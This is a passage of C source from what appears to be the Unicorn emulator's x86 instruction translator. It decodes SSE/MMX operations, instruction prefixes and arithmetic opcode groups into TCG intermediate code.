s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); } tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg] .ZMM_L((val >> 4) & 3))); if ((val >> 0) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); if ((val >> 1) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1))); if ((val >> 2) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2))); if ((val >> 3) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3))); break; case 0x22: if (ot == MO_32) { /* pinsrd */ if (mod == 3) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[rm]); } else { tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); } tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(val & 3))); } else { /* pinsrq */ #ifdef TARGET_X86_64 if (mod == 3) { gen_op_mov_v_reg(s, ot, s->tmp1_i64, rm); } else { tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); } tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(val & 1))); #else goto illegal_op; #endif } break; } return; } if (b1) { op1_offset = offsetof(CPUX86State,xmm_regs[reg]); if (mod == 3) { op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); } else { op2_offset = offsetof(CPUX86State,xmm_t0); gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, op2_offset); } } else { op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); if (mod == 3) { op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } else { op2_offset = offsetof(CPUX86State,mmx_t0); gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, op2_offset); } } val = x86_ldub_code(env, s); if ((b & 0xfc) == 0x60) { /* pcmpXstrX */ set_cc_op(s, CC_OP_EFLAGS); if (s->dflag == MO_64) { /* The helper must use entire 64-bit gp registers */ val |= 1 << 8; } } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_eppi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1, tcg_const_i32(tcg_ctx, val)); break; case 0x33a: /* Various integer extensions at 0f 3a f[0-f]. */ b = modrm | (b1 << 8); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; switch (b) { case 0x3f0: /* rorx Gy,Ey, Ib */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); b = x86_ldub_code(env, s); if (ot == MO_64) { tcg_gen_rotri_tl(tcg_ctx, s->T0, s->T0, b & 63); } else { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_rotri_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, b & 31); tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); } gen_op_mov_reg_v(s, ot, reg, s->T0); break; default: goto unknown_op; } break; default: unknown_op: gen_unknown_opcode(env, s); return; } } else { /* generic MMX or SSE operation */ switch(b) { case 0x70: /* pshufx insn */ case 0xc6: /* pshufx insn */ case 0xc2: /* compare insns */ s->rip_offset = 1; break; default: break; } if (is_xmm) { op1_offset = offsetof(CPUX86State,xmm_regs[reg]); if (mod != 3) { int sz = 4; gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,xmm_t0); switch (b) { case 0x50: case 0x51: case 0x52: case 0x53: case 0x54: case 0x55: case 0x56: case 0x57: case 0x58: case 0x59: case 0x5a: case 0x5c: case 0x5d: case 0x5e: case 0x5f: case 0xc2: /* Most sse scalar operations. */ if (b1 == 2) { sz = 2; } else if (b1 == 3) { sz = 3; } break; case 0x2e: /* ucomis[sd] */ case 0x2f: /* comis[sd] */ if (b1 == 0) { sz = 2; } else { sz = 3; } break; } switch (sz) { case 2: /* 32 bit access */ gen_op_ld_v(s, MO_32, s->T0, s->A0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_t0.ZMM_L(0))); break; case 3: /* 64 bit access */ gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.ZMM_D(0))); break; default: /* 128 bit access */ gen_ldo_env_A0(s, op2_offset); break; } } else { rm = (modrm & 7) | REX_B(s); op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } } else { op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); if (mod != 3) { gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,mmx_t0); gen_ldq_env_A0(s, op2_offset); } else { rm = (modrm & 7); op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } } switch(b) { case 0x0f: /* 3DNow! data insns */ val = x86_ldub_code(env, s); sse_fn_epp = sse_op_table5[val]; if (!sse_fn_epp) { goto unknown_op; } if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) { goto illegal_op; } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x70: /* pshufx insn */ case 0xc6: /* pshufx insn */ val = x86_ldub_code(env, s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); /* XXX: introduce a new table? */ sse_fn_ppi = (SSEFunc_0_ppi)sse_fn_epp; sse_fn_ppi(tcg_ctx, s->ptr0, s->ptr1, tcg_const_i32(tcg_ctx, val)); break; case 0xc2: /* compare insns */ val = x86_ldub_code(env, s); if (val >= 8) goto unknown_op; sse_fn_epp = sse_op_table4[val][b1]; tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0xf7: /* maskmov : we must prepare A0 */ if (mod != 3) goto illegal_op; tcg_gen_mov_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EDI]); gen_extu(tcg_ctx, s->aflag, s->A0); gen_add_A0_ds_seg(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); /* XXX: introduce a new table? */ sse_fn_eppt = (SSEFunc_0_eppt)sse_fn_epp; sse_fn_eppt(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1, s->A0); break; default: tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; } if (b == 0x2e || b == 0x2f) { set_cc_op(s, CC_OP_EFLAGS); } } } // Unicorn: sync EFLAGS on demand static void sync_eflags(DisasContext *s, TCGContext *tcg_ctx) { gen_update_cc_op(s); gen_helper_read_eflags(tcg_ctx, s->T0, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, eflags)); } /* convert one instruction. s->base.is_jmp is set if the translation must be stopped. Return the next pc value */ static target_ulong disas_insn(DisasContext *s, CPUState *cpu) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CPUX86State *env = cpu->env_ptr; int b, prefixes, prefix_count; int shift; MemOp ot, aflag, dflag; int modrm, reg, rm, mod, op, opreg, val; target_ulong next_eip, tval; int rex_w, rex_r, rex_byte, rex_index; target_ulong pc_start = s->base.pc_next; TCGOp *tcg_op, *prev_op = NULL; bool insn_hook = false; s->pc_start = tcg_ctx->pc_start = s->pc = pc_start; s->prefix = 0; s->uc = env->uc; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(env->uc, s->pc)) { // imitate the HLT instruction gen_update_cc_op(s); gen_sync_pc(tcg_ctx, pc_start - s->cs_base); gen_helper_hlt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); s->base.is_jmp = DISAS_NORETURN; return s->pc; } // Unicorn: callback might need to access to EFLAGS, // or want to stop emulation immediately if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, pc_start)) { if (s->last_cc_op != s->cc_op) { sync_eflags(s, tcg_ctx); s->last_cc_op = s->cc_op; } // Sync PC in advance gen_sync_pc(tcg_ctx, pc_start - s->cs_base); // save the last operand prev_op = tcg_last_op(tcg_ctx); insn_hook = true; gen_uc_tracecode(tcg_ctx, 0xf1f1f1f1, UC_HOOK_CODE_IDX, env->uc, pc_start); check_exit_request(tcg_ctx); } s->override = -1; #ifdef TARGET_X86_64 s->rex_x = 0; s->rex_b = 0; s->x86_64_hregs = false; #endif s->rip_offset = 0; /* for relative ip address */ s->vex_l = 0; s->vex_v = 0; if (sigsetjmp(s->jmpbuf, 0) != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); return s->pc; } prefixes = 0; rex_w = -1; rex_r = 0; rex_byte = 0; rex_index = -1; prefix_count = 0; next_byte: b = x86_ldub_code(env, s); /* Collect prefixes. */ switch (b) { case 0xf3: prefixes |= PREFIX_REPZ; prefix_count++; goto next_byte; case 0xf2: prefixes |= PREFIX_REPNZ; prefix_count++; goto next_byte; case 0xf0: prefixes |= PREFIX_LOCK; prefix_count++; goto next_byte; case 0x2e: s->override = R_CS; prefix_count++; goto next_byte; case 0x36: s->override = R_SS; prefix_count++; goto next_byte; case 0x3e: s->override = R_DS; prefix_count++; goto next_byte; case 0x26: s->override = R_ES; prefix_count++; goto next_byte; case 0x64: s->override = R_FS; prefix_count++; goto next_byte; case 0x65: s->override = R_GS; prefix_count++; goto next_byte; case 0x66: prefixes |= PREFIX_DATA; prefix_count++; goto next_byte; case 0x67: prefixes |= PREFIX_ADR; prefix_count++; goto next_byte; #ifdef TARGET_X86_64 case 0x40: case 0x41: case 0x42: case 0x43: case 0x44: case 0x45: case 0x46: case 0x47: case 0x48: case 0x49: case 0x4a: case 0x4b: case 0x4c: case 0x4d: case 0x4e: case 0x4f: if (CODE64(s)) { rex_byte = b; rex_index = prefix_count; prefix_count++; goto next_byte; } break; #endif case 0xc5: /* 2-byte VEX */ case 0xc4: /* 3-byte VEX */ /* VEX prefixes cannot be used except in 32-bit mode. Otherwise the instruction is LES or LDS. */ if (s->code32 && !s->vm86) { static const int pp_prefix[4] = { 0, PREFIX_DATA, PREFIX_REPZ, PREFIX_REPNZ }; int vex3, vex2 = x86_ldub_code(env, s); if (!CODE64(s) && (vex2 & 0xc0) != 0xc0) { /* 4.1.4.6: In 32-bit mode, bits [7:6] must be 11b, otherwise the instruction is LES or LDS. */ s->pc--; /* rewind the advance_pc() x86_ldub_code() did */ break; } /* 4.1.1-4.1.3: No preceding lock, 66, f2, f3, or rex prefixes. */ if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ | PREFIX_LOCK | PREFIX_DATA)) { goto illegal_op; } #ifdef TARGET_X86_64 if (rex_byte != 0) { goto illegal_op; } #endif rex_r = (~vex2 >> 4) & 8; if (b == 0xc5) { /* 2-byte VEX prefix: RVVVVlpp, implied 0f leading opcode byte */ vex3 = vex2; b = x86_ldub_code(env, s) | 0x100; } else { /* 3-byte VEX prefix: RXBmmmmm wVVVVlpp */ #ifdef TARGET_X86_64 s->rex_x = (~vex2 >> 3) & 8; s->rex_b = (~vex2 >> 2) & 8; #endif vex3 = x86_ldub_code(env, s); rex_w = (vex3 >> 7) & 1; switch (vex2 & 0x1f) { case 0x01: /* Implied 0f leading opcode bytes. */ b = x86_ldub_code(env, s) | 0x100; break; case 0x02: /* Implied 0f 38 leading opcode bytes. */ b = 0x138; break; case 0x03: /* Implied 0f 3a leading opcode bytes. */ b = 0x13a; break; default: /* Reserved for future use. */ goto unknown_op; } } s->vex_v = (~vex3 >> 3) & 0xf; s->vex_l = (vex3 >> 2) & 1; prefixes |= pp_prefix[vex3 & 3] | PREFIX_VEX; } prefix_count++; break; } /* Post-process prefixes. */ if (CODE64(s)) { /* 2.2.1: A REX prefix is ignored when it does not immediately precede the opcode byte */ if (rex_byte != 0 && rex_index + 1 == prefix_count) { /* REX prefix */ rex_w = (rex_byte >> 3) & 1; rex_r = (rex_byte & 0x4) << 1; s->rex_x = (rex_byte & 0x2) << 2; REX_B(s) = (rex_byte & 0x1) << 3; /* select uniform byte register addressing */ s->x86_64_hregs = true; } /* In 64-bit mode, the default data size is 32-bit. Select 64-bit data with rex_w, and 16-bit data with 0x66; rex_w takes precedence over 0x66 if both are present. */ dflag = (rex_w > 0 ? MO_64 : prefixes & PREFIX_DATA ? MO_16 : MO_32); /* In 64-bit mode, 0x67 selects 32-bit addressing. */ aflag = (prefixes & PREFIX_ADR ? MO_32 : MO_64); } else { /* In 16/32-bit mode, 0x66 selects the opposite data size. */ if (s->code32 ^ ((prefixes & PREFIX_DATA) != 0)) { dflag = MO_32; } else { dflag = MO_16; } /* In 16/32-bit mode, 0x67 selects the opposite addressing. */ if (s->code32 ^ ((prefixes & PREFIX_ADR) != 0)) { aflag = MO_32; } else { aflag = MO_16; } } s->prefix = prefixes; s->aflag = aflag; s->dflag = dflag; /* now check op code */ reswitch: switch(b) { case 0x0f: /**************************/ /* extended op code */ b = x86_ldub_code(env, s) | 0x100; goto reswitch; /**************************/ /* arith & logic */ case 0x00: case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x30: case 0x31: case 0x32: case 0x33: case 0x34: case 0x35: case 0x38: case 0x39: case 0x3a: case 0x3b: case 0x3c: case 0x3d: { int op, f, val; op = (b >> 3) & 7; f = (b >> 1) & 3; ot = mo_b_d(b, dflag); switch(f) { case 0: /* OP Ev, Gv */ modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod != 3) { gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else if (op == OP_XORL && rm == reg) { xor_zero: /* xor reg, reg optimisation */ set_cc_op(s, CC_OP_CLR); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); gen_op_mov_reg_v(s, ot, reg, s->T0); break; } else { opreg = rm; } gen_op_mov_v_reg(s, ot, s->T1, reg); gen_op(s, op, ot, opreg); break; case 1: /* OP Gv, Ev */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; rm = (modrm & 7) | REX_B(s); if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, s->T1, s->A0); } else if (op == OP_XORL && rm == reg) { goto xor_zero; } else { gen_op_mov_v_reg(s, ot, s->T1, rm); } gen_op(s, op, ot, reg); break; case 2: /* OP A, Iv */ val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op(s, op, ot, OR_EAX); break; } } break; case 0x82: if (CODE64(s)) goto illegal_op; /* fall through */ case 0x80: /* GRP1 */ case 0x81: case 0x83: { int val; ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); op = (modrm >> 3) & 7; if (mod != 3) { if (b == 0x83) s->rip_offset = 1; else s->rip_offset = insn_const_size(ot); gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else { opreg = rm; } switch(b) { default: case 0x80: case 0x81: case 0x82: val = insn_get(env, s, ot); break; case 0x83: val = (int8_t)insn_get(env, s, MO_8); break; } tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op(s, op, ot, opreg); } break; /**************************/ /* inc, dec, and other misc arith */ case 0x40: /* inc Gv */ case 0x41: /* inc Gv */ case 0x42: /* inc Gv */ case 0x43: /* inc Gv */ case 0x44: /* inc Gv */ case 0x45: /* inc Gv */ case 0x46: /* inc Gv */ case 0x47: /* inc Gv */ ot = dflag; gen_inc(s, ot, OR_EAX + (b & 7), 1); break; case 0x48: /* dec Gv */ case 0x49: /* dec Gv */ case 0x4a: /* dec Gv */ case 0x4b: /* dec Gv */ case 0x4c: /* dec Gv */ case 0x4d: /* dec Gv */ case 0x4e: /* dec Gv */ case 0x4f: /* dec Gv */ ot = dflag; gen_inc(s, ot, OR_EAX + (b & 7), -1); break; case 0xf6: /* GRP3 */ case 0xf7: ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); op = (modrm >> 3) & 7; if (mod != 3) { if (op == 0) { s->rip_offset = insn_const_size(ot); } gen_lea_modrm(env, s, modrm); /* For those below that handle locked memory, don't load here. */ if (!(s->prefix & PREFIX_LOCK) || op != 2) { gen_op_ld_v(s, ot, s->T0, s->A0); } } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } switch(op) { case 0: /* test */ val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op_testl_T0_T1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 2: /* not */ if (s->prefix & PREFIX_LOCK) { if (mod == 3) { goto illegal_op; } tcg_gen_movi_tl(tcg_ctx, s->T0, ~0); tcg_gen_atomic_xor_fetch_tl(tcg_ctx, s->T0, s->A0, s->T0, s->mem_index, ot | MO_LE); } else { tcg_gen_not_tl(tcg_ctx, s->T0, s->T0); if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, rm, s->T0); } } break; case 3: /* neg */ if (s->prefix & PREFIX_LOCK) { TCGLabel *label1; TCGv a0, t0, t1, t2; if (mod == 3) { goto illegal_op; } a0 = tcg_temp_local_new(tcg_ctx); t0 = tcg_temp_local_new(tcg_ctx); label1 = gen_new_label(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, a0, s->A0); tcg_gen_mov_tl(tcg_ctx, t0, s->T0); gen_set_label(tcg_ctx, label1); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, t2, t0); tcg_gen_neg_tl(tcg_ctx, t1, t0); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, t0, a0, t0, t1, s->mem_index, ot | MO_LE); tcg_temp_free(tcg_ctx, t1); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, t2, label1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, a0); tcg_gen_mov_tl(tcg_ctx, s->T0, t0); tcg_temp_free(tcg_ctx, t0); } else { tcg_gen_neg_tl(tcg_ctx, s->T0, s->T0); if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, rm, s->T0); } } gen_op_update_neg_cc(s); set_cc_op(s, CC_OP_SUBB + ot); break; case 4: /* mul */ switch(ot) { case MO_8: gen_op_mov_v_reg(s, MO_8, s->T1, R_EAX); tcg_gen_ext8u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext8u_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, 0xff00); set_cc_op(s, CC_OP_MULB); break; case MO_16: gen_op_mov_v_reg(s, MO_16, s->T1, R_EAX); tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext16u_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, 16); gen_op_mov_reg_v(s, MO_16, R_EDX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); set_cc_op(s, CC_OP_MULW); break; default: case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mulu2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], s->tmp2_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EDX], s->tmp3_i32); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EDX]); set_cc_op(s, CC_OP_MULL); break; #ifdef TARGET_X86_64 case MO_64: tcg_gen_mulu2_i64(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->T0, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EDX]); set_cc_op(s, CC_OP_MULQ); break; #endif } break; case 5: /* imul */ switch(ot) { case MO_8: gen_op_mov_v_reg(s, MO_8, s->T1, R_EAX); tcg_gen_ext8s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext8s_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_ext8s_tl(tcg_ctx, s->tmp0, s->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, s->tmp0); set_cc_op(s, CC_OP_MULB); break; case MO_16: gen_op_mov_v_reg(s, MO_16, s->T1, R_EAX); tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->tmp0, s->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, s->tmp0); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, 16); gen_op_mov_reg_v(s, MO_16, R_EDX, s->T0); set_cc_op(s, CC_OP_MULW); break; default: case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_muls2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], s->tmp2_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EDX], s->tmp3_i32); tcg_gen_sari_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 31); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_sub_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp2_i32); set_cc_op(s, CC_OP_MULL); break; #ifdef TARGET_X86_64 case MO_64: tcg_gen_muls2_i64(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->T0, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EAX], 63); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EDX]); set_cc_op(s, CC_OP_MULQ); break; #endif } break; case 6: /* div */ switch(ot) { case MO_8: gen_helper_divb_AL(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; case MO_16: gen_helper_divw_AX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; default: case MO_32: gen_helper_divl_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_divq_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #endif } break; case 7: /* idiv */ switch(ot) { case MO_8: gen_helper_idivb_AL(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; case MO_16: gen_helper_idivw_AX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; default: case MO_32: gen_helper_idivl_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_idivq_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #endif } break; default: goto unknown_op; } break; case 0xfe: /* GRP4 */ case 0xff: /* GRP5 */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); op = (modrm >> 3) & 7; if (op >= 2 && b == 0xfe) { goto unknown_op; } if (CODE64(s)) { if (op == 2 || op == 4) { /* operand size for jumps is 64 bit */ ot = MO_64; } else if (op == 3 || op == 5) { ot = dflag != MO_16 ? MO_32 + (rex_w == 1) : MO_16; } else if (op == 6) { /* default push size is 64 bit */ ot = mo_pushpop(s, dflag); } } if (mod != 3) { gen_lea_modrm(env, s, modrm); if (op >= 2 && op != 3 && op != 5) gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } switch(op) { case 0: /* inc Ev */ if (mod != 3) opreg = OR_TMP0; else opreg = rm; gen_inc(s, ot, opreg, 1); break; case 1: /* dec Ev */ if (mod != 3) opreg = OR_TMP0; else opreg = rm; gen_inc(s, ot, opreg, -1); break; case 2: /* call Ev */ /* XXX: optimize if memory (no 'and' is necessary) */ if (dflag == MO_16) { tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); } next_eip = s->pc - s->cs_base; tcg_gen_movi_tl(tcg_ctx, s->T1, next_eip); gen_push_v(s, s->T1); gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 3: /* lcall Ev */ if (mod == 3) { goto illegal_op; } gen_op_ld_v(s, ot, s->T1, s->A0); gen_add_A0_im(s, 1 << ot); gen_op_ld_v(s, MO_16, s->T0, s->A0); do_lcall: if (s->pe && !s->vm86) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_lcall_protected(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T1, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_tl(tcg_ctx, s->pc - s->cs_base)); } else { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_lcall_real(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T1, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); } tcg_gen_ld_tl(tcg_ctx, s->tmp4, tcg_ctx->cpu_env, 